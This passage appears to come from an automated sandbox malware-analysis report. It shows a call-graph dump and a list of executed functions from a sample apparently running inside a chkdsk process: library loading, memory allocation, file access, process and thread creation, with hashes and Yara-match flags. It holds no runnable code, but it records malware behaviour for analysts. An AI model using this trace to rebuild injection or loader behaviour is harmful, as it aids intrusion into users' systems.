4aa8eb0 31205->31307 31206->31205 31209 4aa8eb0 LdrLoadDll 31210 4aa9016 31209->31210 31211 4aa8eb0 LdrLoadDll 31210->31211 31212 4aa901f 31211->31212 31213 4aa8eb0 LdrLoadDll 31212->31213 31214 4aa9028 31213->31214 31215 4aa8eb0 LdrLoadDll 31214->31215 31216 4aa9031 31215->31216 31217 4aa8eb0 LdrLoadDll 31216->31217 31218 4aa903d 31217->31218 31219 4aa8eb0 LdrLoadDll 31218->31219 31220 4aa9046 31219->31220 31221 4aa8eb0 LdrLoadDll 31220->31221 31222 4aa904f 31221->31222 31223 4aa8eb0 LdrLoadDll 31222->31223 31224 4aa9058 31223->31224 31225 4aa8eb0 LdrLoadDll 31224->31225 31226 4aa9061 31225->31226 31227 4aa8eb0 LdrLoadDll 31226->31227 31228 4aa906a 31227->31228 31229 4aa8eb0 LdrLoadDll 31228->31229 31230 4aa9076 31229->31230 31231 4aa8eb0 LdrLoadDll 31230->31231 31232 4aa907f 31231->31232 31233 4aa8eb0 LdrLoadDll 31232->31233 31234 4aa9088 31233->31234 31235 4aa8eb0 LdrLoadDll 31234->31235 31236 4aa9091 31235->31236 31237 4aa8eb0 LdrLoadDll 31236->31237 31238 4aa909a 31237->31238 31239 4aa8eb0 LdrLoadDll 31238->31239 31240 4aa90a3 31239->31240 31241 4aa8eb0 LdrLoadDll 31240->31241 31242 4aa90af 31241->31242 31243 4aa8eb0 LdrLoadDll 31242->31243 31244 4aa90b8 31243->31244 31245 4aa8eb0 LdrLoadDll 31244->31245 31246 4aa90c1 31245->31246 31247 4aa8eb0 LdrLoadDll 31246->31247 31248 4aa90ca 31247->31248 31249 4aa8eb0 LdrLoadDll 31248->31249 31250 4aa90d3 31249->31250 31251 4aa8eb0 LdrLoadDll 31250->31251 31252 4aa90dc 31251->31252 31253 4aa8eb0 LdrLoadDll 31252->31253 31254 4aa90e8 31253->31254 31255 4aa8eb0 LdrLoadDll 31254->31255 31256 4aa90f1 31255->31256 31257 4aa8eb0 LdrLoadDll 31256->31257 31258 4aa90fa 31257->31258 31259 4aa8eb0 LdrLoadDll 31258->31259 31260 4aa9103 31259->31260 31261 4aa8eb0 LdrLoadDll 31260->31261 31262 4aa910c 31261->31262 31263 4aa8eb0 LdrLoadDll 31262->31263 31264 4aa9115 31263->31264 31265 4aa8eb0 LdrLoadDll 31264->31265 31266 4aa9121 31265->31266 31267 4aa8eb0 LdrLoadDll 31266->31267 31268 4aa912a 31267->31268 31269 4aa8eb0 LdrLoadDll 31268->31269 31270 4aa9133 31269->31270 31271 4aa8eb0 LdrLoadDll 31270->31271 31272 4aa913c 31271->31272 31273 4aa8eb0 LdrLoadDll 31272->31273 31274 4aa9145 31273->31274 31275 4aa8eb0 LdrLoadDll 31274->31275 31276 4aa914e 31275->31276 31277 4aa8eb0 LdrLoadDll 31276->31277 31278 4aa915a 31277->31278 31279 4aa8eb0 LdrLoadDll 31278->31279 31280 4aa9163 31279->31280 31281 4aa8eb0 LdrLoadDll 31280->31281 31282 4aa916c 31281->31282 31282->31061 31284 4aa91e0 LdrLoadDll 31283->31284 31285 4aa815c 31284->31285 31313 4dc9860 LdrInitializeThunk 31285->31313 31286 4aa8173 31286->30981 31288->31058 31290 4aa91e0 LdrLoadDll 31289->31290 31291 4aa87dc NtAllocateVirtualMemory 31290->31291 31291->31161 31293 4aab260 31292->31293 31294 4aab266 31292->31294 31293->31167 31295 4aaa270 2 API calls 31294->31295 31296 4aab28c 31295->31296 31296->31167 31298 4aab2f0 31297->31298 31299 4aaa270 2 API calls 31298->31299 31302 4aab34d 31298->31302 31300 4aab32a 31299->31300 31301 4aaa0a0 2 API calls 31300->31301 31301->31302 31302->31175 31304 4aaa0a0 2 API calls 31303->31304 31305 4aa3324 31304->31305 31305->31186 31306->31171 31308 4aa8ecb 31307->31308 31309 4aa3e50 LdrLoadDll 31308->31309 31310 4aa8eeb 31309->31310 31311 4aa3e50 LdrLoadDll 31310->31311 31312 4aa8f97 31310->31312 31311->31312 31312->31209 31313->31286 31315 4dc968f LdrInitializeThunk 31314->31315 31316 4dc9681 31314->31316 31315->31067 31316->31067 31318 4aa890c RtlFreeHeap 31317->31318 31319 4aa91e0 LdrLoadDll 31317->31319 31318->31071 31319->31318 31321 4a96e2b 31320->31321 31322 4a96e30 31320->31322 31321->30989 31323 4aaa020 2 API calls 31322->31323 31330 4a96e55 31323->31330 31324 4a96eb8 31324->30989 31325 4aa8140 2 API calls 31325->31330 31326 4a96ebe 31327 4a96ee4 31326->31327 31329 4aa8840 2 API calls 31326->31329 31327->30989 31331 4a96ed5 31329->31331 31330->31324 31330->31325 31330->31326 31332 4aaa020 2 API calls 31330->31332 31336 4aa8840 31330->31336 31331->30989 31332->31330 31334 4aa8840 2 API calls 31333->31334 31335 4a970fe 31334->31335 31335->30950 31337 4aa91e0 LdrLoadDll 31336->31337 31338 4aa885c 31337->31338 31341 4dc96e0 LdrInitializeThunk 31338->31341 31339 4aa8873 31339->31330 31341->31339 31343 4aa9843 31342->31343 31346 4a99b40 31343->31346 31347 4a99b64 31346->31347 31348 4a99ba0 LdrLoadDll 31347->31348 31349 4a98a7b 31347->31349 31348->31349 31349->30958 31351 4a99eb3 31350->31351 31353 4a99f30 31351->31353 31365 4aa7f10 LdrLoadDll 31351->31365 31353->30963 31355 4aa91e0 LdrLoadDll 31354->31355 31356 4a9cfab 31355->31356 31356->30966 31357 4aa8a50 31356->31357 31358 4aa91e0 LdrLoadDll 31357->31358 31359 4aa8a6f LookupPrivilegeValueW 31358->31359 31359->30968 31361 4aa91e0 LdrLoadDll 31360->31361 31362 4aa84fc 31361->31362 31366 4dc9910 LdrInitializeThunk 31362->31366 31363 4aa851b 31363->30969 31365->31353 31366->31363 31368 4a9a037 31367->31368 31369 4a99e90 LdrLoadDll 31368->31369 31370 4a9a066 31369->31370 31370->30909 31372 4a99d84 31371->31372 31425 4aa7f10 LdrLoadDll 31372->31425 31374 4a99dbe 31374->30911 31376 4a9d19c 31375->31376 31377 4a9a010 LdrLoadDll 31376->31377 31378 4a9d1ae 31377->31378 31426 4a9d080 31378->31426 31381 4a9d1c9 31383 4aa8710 2 API calls 31381->31383 31384 4a9d1d4 31381->31384 31382 4a9d1e1 31385 4aa8710 2 API calls 31382->31385 31386 4a9d1f2 31382->31386 31383->31384 31384->30914 31385->31386 31386->30914 31388 4a9aee6 31387->31388 31389 4a9aef0 31387->31389 31388->30923 31390 4a99e90 LdrLoadDll 31389->31390 31391 4a9af61 31390->31391 31392 4a99d60 LdrLoadDll 31391->31392 31393 4a9af75 31392->31393 31394 4a9af98 31393->31394 31395 4a99e90 LdrLoadDll 31393->31395 31394->30923 31396 4a9afb4 31395->31396 31397 4aa3a50 8 API calls 31396->31397 31398 4a9b009 31397->31398 31398->30923 31400 4a9ba66 31399->31400 31401 4a99e90 LdrLoadDll 31400->31401 31402 4a9ba7a 31401->31402 31445 4a9b730 31402->31445 31407 4a97c83 31405->31407 31473 4a9d430 31405->31473 31418 4a97e31 31407->31418 31478 4aa33a0 31407->31478 31409 4a97ce2 31409->31418 31481 4a97a20 31409->31481 31412 4aab250 2 API calls 31413 4a97d29 31412->31413 31414 4aab380 3 API calls 31413->31414 31415 4a97d3e 31414->31415 31416 4a96e20 4 API calls 31415->31416 31415->31418 31421 4a970e0 2 API calls 31415->31421 31486 4a9ac00 31415->31486 31536 4a9d3d0 31415->31536 31540 4a9ceb0 21 API calls 31415->31540 31416->31415 31418->30935 31421->31415 31422->30917 31423 4a9b020 LdrLoadDll 31423->30928 31424->30937 31425->31374 31427 4a9d09a 31426->31427 31435 4a9d150 31426->31435 31428 4a99e90 LdrLoadDll 31427->31428 31429 4a9d0bc 31428->31429 31436 4aa81c0 31429->31436 31431 4a9d0fe 31439 4aa8200 31431->31439 31434 4aa8710 2 API calls 31434->31435 31435->31381 31435->31382 31437 4aa81dc 31436->31437 31438 4aa91e0 LdrLoadDll 31436->31438 31437->31431 31438->31437 31440 4aa821c 31439->31440 31441 4aa91e0 LdrLoadDll 31439->31441 31444 4dc9fe0 LdrInitializeThunk 31440->31444 31441->31440 31442 4a9d144 31442->31434 31444->31442 31446 4a9b747 31445->31446 31453 4a9d470 31446->31453 31450 4a9b7bb 31451 4a97f8c 31450->31451 31464 4aa8520 LdrLoadDll 31450->31464 31451->31423 31454 4a9d495 31453->31454 31465 4a97120 31454->31465 31456 4a9b78f 31461 4aa8960 31456->31461 31457 4aa3a50 8 API calls 31459 4a9d4b9 31457->31459 31459->31456 31459->31457 31460 4aaa0a0 2 API calls 31459->31460 31472 4a9d2b0 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 31459->31472 31460->31459 31462 4aa91e0 LdrLoadDll 31461->31462 31463 4aa897f CreateProcessInternalW 31462->31463 31463->31450 31464->31451 31466 4a9721f 31465->31466 31467 4a97135 31465->31467 31466->31459 31467->31466 31468 4aa3a50 8 API calls 31467->31468 31469 4a971a2 31468->31469 31470 4aaa0a0 2 API calls 31469->31470 31471 4a971c9 31469->31471 31470->31471 31471->31459 31472->31459 31474 4a9d44f 31473->31474 31475 4aa3e50 LdrLoadDll 31473->31475 31476 4a9d45d 31474->31476 31477 4a9d456 SetErrorMode 31474->31477 31475->31474 31476->31407 31477->31476 31541 4a9d200 31478->31541 31480 4aa33c6 31480->31409 31482 4aaa020 2 API calls 31481->31482 31483 4a97a45 31482->31483 31485 4a97c5a 31483->31485 31560 4aa7b00 31483->31560 31485->31412 31487 4a9ac19 31486->31487 31488 4a9ac1f 31486->31488 31608 4a9ccc0 31487->31608 31618 4a98620 31488->31618 31491 4a9ac2c 31492 4aab380 3 API calls 31491->31492 31535 4a9aeb8 31491->31535 31493 4a9ac48 31492->31493 31494 4a9ac5c 31493->31494 31495 4a9d3d0 2 API calls 31493->31495 31627 4aa7f90 31494->31627 31495->31494 31498 4a9ad86 31643 4a9aba0 LdrLoadDll LdrInitializeThunk 31498->31643 31499 4aa8180 2 API calls 31500 4a9acda 31499->31500 31500->31498 31506 4a9ace6 31500->31506 31502 4a9ada5 31503 4a9adad 31502->31503 31644 4a9ab10 LdrLoadDll NtClose LdrInitializeThunk 31502->31644 31507 4aa8710 2 API calls 31503->31507 31505 4a9ad2f 31508 4aa8710 2 API calls 31505->31508 31506->31505 31510 4aa8290 2 API calls 31506->31510 31506->31535 31511 4a9adb7 31507->31511 31512 4a9ad4c 31508->31512 31509 4a9adcf 31509->31503 31513 4a9add6 31509->31513 31510->31505 31511->31415 31630 4aa75b0 31512->31630 31515 4a9adee 31513->31515 31645 4a9aa90 LdrLoadDll LdrInitializeThunk 31513->31645 31646 4aa8010 LdrLoadDll 31515->31646 31516 4a9ad63 31516->31535 31633 4a97280 31516->31633 31519 4a9ae02 31647 4a9a910 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 31519->31647 31523 4a9ae26 31524 4a9ae73 31523->31524 31648 4aa8040 LdrLoadDll 31523->31648 31650 4aa80a0 LdrLoadDll 31524->31650 31527 4a9ae81 31529 4aa8710 2 API calls 31527->31529 31528 4a9ae44 31528->31524 31649 4aa80d0 LdrLoadDll 31528->31649 31530 4a9ae8b 31529->31530 31532 4aa8710 2 API calls 31530->31532 31533 4a9ae95 31532->31533 31534 4a97280 3 API calls 31533->31534 31533->31535 31534->31535 31535->31415 31537 4a9d3e3 31536->31537 31722 4aa8110 31537->31722 31540->31415 31542 4a9d21d 31541->31542 31543 4a9d25e 31542->31543 31548 4aa8240 31542->31548 31545 4a9d265 31543->31545 31553 4aa8290 31543->31553 31545->31480 31549 4aa825c 31548->31549 31550 4aa91e0 LdrLoadDll 31548->31550 31558 4dc99a0 LdrInitializeThunk 31549->31558 31550->31549 31551 4aa827f 31551->31543 31554 4aa82ac 31553->31554 31555 4aa91e0 LdrLoadDll 31553->31555 31559 4dc9780 LdrInitializeThunk 31554->31559 31555->31554 31556 4a9d28e 31556->31480 31558->31551 31559->31556 31561 4aaa270 2 API calls 31560->31561 31562 4aa7b17 31561->31562 31581 4a98160 31562->31581 31564 4aa7b32 31565 4aa7b59 31564->31565 31566 4aa7b70 31564->31566 31567 4aaa0a0 2 API calls 31565->31567 31569 4aaa020 2 API calls 31566->31569 31568 4aa7b66 31567->31568 31568->31485 31570 4aa7baa 31569->31570 31571 4aaa020 2 API calls 31570->31571 31572 4aa7bc3 31571->31572 31578 4aa7e64 31572->31578 31587 4aaa060 LdrLoadDll 31572->31587 31574 4aa7e49 31575 4aa7e50 31574->31575 31574->31578 31576 4aaa0a0 2 API calls 31575->31576 31577 4aa7e5a 31576->31577 31577->31485 31579 4aaa0a0 2 API calls 31578->31579 31580 4aa7eb9 31579->31580 31580->31485 31582 4a98185 31581->31582 31583 4a99b40 LdrLoadDll 31582->31583 31584 4a981b8 31583->31584 31586 4a981dd 31584->31586 31588 4a9b340 31584->31588 31586->31564 31587->31574 31589 4a9b36c 31588->31589 31590 4aa8460 LdrLoadDll 31589->31590 31591 4a9b385 31590->31591 31592 4a9b38c 31591->31592 31599 4aa84a0 31591->31599 31592->31586 31596 4a9b3c7 31597 4aa8710 2 API calls 31596->31597 31598 4a9b3ea 31597->31598 31598->31586 31600 4aa91e0 LdrLoadDll 31599->31600 31601 4aa84bc 31600->31601 31607 4dc9710 LdrInitializeThunk 31601->31607 31602 4a9b3af 31602->31592 31604 4aa8a90 31602->31604 31605 4aa8aaf 31604->31605 31606 4aa91e0 LdrLoadDll 31604->31606 31605->31596 31606->31605 31607->31602 31609 4a9ccc7 31608->31609 31651 4a9bdb0 31609->31651 31611 4a9ccd7 31617 4a9ccf0 31611->31617 31664 4a93d70 31611->31664 31613 4aaa270 2 API calls 31615 4a9ccfe 31613->31615 31614 4a9ccea 31688 4aa7430 31614->31688 31615->31488 31617->31613 31620 4a9863b 31618->31620 31619 4a9875b 31619->31491 31620->31619 31621 4a9d080 3 API calls 31620->31621 31622 4a9873c 31621->31622 31623 4a9876a 31622->31623 31624 4a98751 31622->31624 31625 4aa8710 2 API calls 31622->31625 31623->31491 31721 4a95ea0 LdrLoadDll 31624->31721 31625->31624 31628 4aa91e0 LdrLoadDll 31627->31628 31629 4a9acb0 31627->31629 31628->31629 31629->31498 31629->31499 31629->31535 31631 4aa75e2 31630->31631 31632 4a9d3d0 2 API calls 31630->31632 31631->31516 31632->31631 31634 4a97298 31633->31634 31635 4a99b40 LdrLoadDll 31634->31635 31636 4a972b3 31635->31636 31637 4aa3e50 LdrLoadDll 31636->31637 31638 4a972c3 31637->31638 31639 4a972cc PostThreadMessageW 31638->31639 31640 4a972fd 31638->31640 31641 4a972dc 31639->31641 31640->31415 31641->31640 31642 4a972ea PostThreadMessageW 31641->31642 31642->31640 31643->31502 31644->31509 31645->31515 31646->31519 31647->31523 31648->31528 31649->31524 31650->31527 31652 4a9bde3 31651->31652 31693 4a9a150 31652->31693 31654 4a9bdf5 31697 4a9a2c0 31654->31697 31656 4a9be13 31657 4a9a2c0 LdrLoadDll 31656->31657 31658 4a9be29 31657->31658 31659 4a9d200 3 API calls 31658->31659 31660 4a9be4d 31659->31660 31661 4a9be54 31660->31661 31700 4aaa2b0 LdrLoadDll RtlAllocateHeap 31660->31700 31661->31611 31663 4a9be64 31663->31611 31665 4a93d96 31664->31665 31666 4a9b340 3 API calls 31665->31666 31668 4a93e61 31666->31668 31667 4a93e68 31667->31614 31668->31667 31701 4aaa2f0 31668->31701 31670 4a93ec9 31671 4a99e90 LdrLoadDll 31670->31671 31672 4a93fd3 31671->31672 31673 4a99e90 LdrLoadDll 31672->31673 31674 4a93ff7 31673->31674 31705 4a9b400 31674->31705 31678 4a94083 31679 4aaa020 2 API calls 31678->31679 31680 4a94110 31679->31680 31681 4aaa020 2 API calls 31680->31681 31683 4a9412a 31681->31683 31682 4a942a6 31682->31614 31683->31682 31684 4a99e90 LdrLoadDll 31683->31684 31685 4a9416a 31684->31685 31686 4a99d60 LdrLoadDll 31685->31686 31687 4a9420a 31686->31687 31687->31614 31689 4aa3e50 LdrLoadDll 31688->31689 31690 4aa7451 31689->31690 31691 4aa7477 31690->31691 31692 4aa7464 CreateThread 31690->31692 31691->31617 31692->31617 31694 4a9a177 31693->31694 31695 4a99e90 LdrLoadDll 31694->31695 31696 4a9a1b3 31695->31696 31696->31654 31698 4a99e90 LdrLoadDll 31697->31698 31699 4a9a2d9 31697->31699 31698->31699 31699->31656 31700->31663 31702 4aaa2fd 31701->31702 31703 4aa3e50 LdrLoadDll 31702->31703 31704 4aaa310 31703->31704 31704->31670 31706 4a9b425 31705->31706 31714 4aa8310 31706->31714 31709 4aa83a0 31710 4aa91e0 LdrLoadDll 31709->31710 31711 4aa83bc 31710->31711 31720 4dc9650 LdrInitializeThunk 31711->31720 31712 4aa83db 31712->31678 31715 4aa91e0 LdrLoadDll 31714->31715 31716 4aa832c 31715->31716 31719 4dc96d0 LdrInitializeThunk 31716->31719 31717 4a9405c 31717->31678 31717->31709 31719->31717 31720->31712 31721->31619 31723 4aa91e0 LdrLoadDll 31722->31723 31724 4aa812c 31723->31724 31727 4dc9840 LdrInitializeThunk 31724->31727 31725 4a9d40e 31725->31415 31727->31725 31728 4aa7300 31729 4aa733b 31728->31729 31730 4aaa020 2 API calls 31728->31730 31731 4aa741c 31729->31731 31732 4a99b40 LdrLoadDll 31729->31732 31730->31729 31733 4aa7371 31732->31733 31734 4aa3e50 LdrLoadDll 31733->31734 31736 4aa738d 31734->31736 31735 4aa73a0 Sleep 31735->31736 31736->31731 31736->31735 31739 4aa6f30 LdrLoadDll 31736->31739 31740 4aa7130 LdrLoadDll 31736->31740 31739->31736 31740->31736 31743 4dc9540 LdrInitializeThunk

                                                      Executed Functions

                                                      Function 04AA85E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 265 4aa85e0-4aa8631 call 4aa91e0 NtCreateFile
                                                      APIs
                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,04AA3BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,04AA3BB7,007A002E,00000000,00000060,00000000,00000000), ref: 04AA862D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4a90000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID: .z`
                                                      • API String ID: 823142352-1441809116
                                                      • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                      • Instruction ID: ef1b63cf8080f4e1ca3c66050196d8e18e57d61ed89cb18ec85578ad5c39e49c
                                                      • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                      • Instruction Fuzzy Hash: F1F0BDB2205208ABCB48CF88DC84EEB77ADAF8C754F158248FA0D97240C630F811CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04AA85DA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 262 4aa85da-4aa85f6 263 4aa85fc-4aa8631 NtCreateFile 262->263 264 4aa85f7 call 4aa91e0 262->264 264->263
                                                      APIs
                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,04AA3BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,04AA3BB7,007A002E,00000000,00000060,00000000,00000000), ref: 04AA862D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4a90000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID: .z`
                                                      • API String ID: 823142352-1441809116
                                                      • Opcode ID: 8dd1a51220632db7dd36851192de31b55a9dd41f8ee4612f6b661a04faa73de2
                                                      • Instruction ID: 6dac5fd243c1a88faced1c052e31c68681c9b9bb2e08c2ccaa0f3629f601f9d8
                                                      • Opcode Fuzzy Hash: 8dd1a51220632db7dd36851192de31b55a9dd41f8ee4612f6b661a04faa73de2
                                                      • Instruction Fuzzy Hash: AF01B2B2215208ABCB48DF89DD85EEB77ADAF8C754F158248FA0D97250D630E911CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04AA8690 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtReadFile.NTDLL(04AA3D72,5E972F65,FFFFFFFF,04AA3A31,?,?,04AA3D72,?,04AA3A31,FFFFFFFF,5E972F65,04AA3D72,?,00000000), ref: 04AA86D5
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4a90000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                      • Instruction ID: cac850fb891fba86128c10c4f0eb799131ff182452e7bbbc99c84e471cc1707b
                                                      • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                      • Instruction Fuzzy Hash: 2BF0A4B2200208ABDB14DF89DC84EEB77ADAF8C754F158648BA1D97241D630E911CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04AA87C0 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,04A92D11,00002000,00003000,00000004), ref: 04AA87F9
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4a90000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID:
                                                      • API String ID: 2167126740-0
                                                      • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                      • Instruction ID: 3c732b3fc8ddfc0556ece49eb09e4487def9700ee5a84208ac500d9870802ce9
                                                      • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                      • Instruction Fuzzy Hash: FEF015B2200208ABDB14DF89CC84EAB77ADAF88654F118548FE0897241C630F910CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04AA8710 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtClose.NTDLL(04AA3D50,?,?,04AA3D50,00000000,FFFFFFFF), ref: 04AA8735
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4a90000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                      • Instruction ID: b2234ce79c3243b3cad6fd89e96c5dc65602a95c4f4e49ff875086f254d876f4
                                                      • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                      • Instruction Fuzzy Hash: E2D01776200214ABE710EB98CC89EA77BACEF48660F154499BA189B242C630FA10C6E0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04AA870C Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtClose.NTDLL(04AA3D50,?,?,04AA3D50,00000000,FFFFFFFF), ref: 04AA8735
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4a90000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: 3edb4c14f6f14404a31a0132655fdc4f475eb7a39e58fefa9444ae8d119a2012
                                                      • Instruction ID: 0a5b3dd20309016139b9f9d5bf48ee6b28671a0bac1bcb4dd3c7bfa58d390407
                                                      • Opcode Fuzzy Hash: 3edb4c14f6f14404a31a0132655fdc4f475eb7a39e58fefa9444ae8d119a2012
                                                      • Instruction Fuzzy Hash: B0D02B9940D2C05FDB10FBB4A4C40D37F80EE5115871459CED4A857603D621E315D391
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DC95D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 74f3cd559d9e348495a0492bc6c07b83613718cbd1a2c940e7b46f0303098133
                                                      • Instruction ID: b5dc39539c7a1e0a928a1fe9196ee754ff51b4652e32bb25225167d536ad6205
                                                      • Opcode Fuzzy Hash: 74f3cd559d9e348495a0492bc6c07b83613718cbd1a2c940e7b46f0303098133
                                                      • Instruction Fuzzy Hash: B09002A1242000076505719D4414616401B97E4245F51C021E10055A0DC565D8D17165
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DC9540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: d85f2744397a440df4d424ce8090ac92f3b665675c4e81ac7a3e759696da7b05
                                                      • Instruction ID: ea0c235a2891a7ea445cbc9fd8b0de279a9ab13dcd443f51125ff1f1163174a6
                                                      • Opcode Fuzzy Hash: d85f2744397a440df4d424ce8090ac92f3b665675c4e81ac7a3e759696da7b05
                                                      • Instruction Fuzzy Hash: FB900265251000072505A59D0704507005797D9395751C021F1006560CD661D8A16161
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DC96D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 3b969c0c0fcd23f99e417bc754e6969177acc3b61c0477ea5afcc0c5441a1a01
                                                      • Instruction ID: e1c12f24b3e8373cee62db851252fad2f6d8b02e266ba8339f6de317581af8a0
                                                      • Opcode Fuzzy Hash: 3b969c0c0fcd23f99e417bc754e6969177acc3b61c0477ea5afcc0c5441a1a01
                                                      • Instruction Fuzzy Hash: 1890027124100846F500619D4404B46001697E4345F51C016A0115664D8655D8917561
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DC96E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
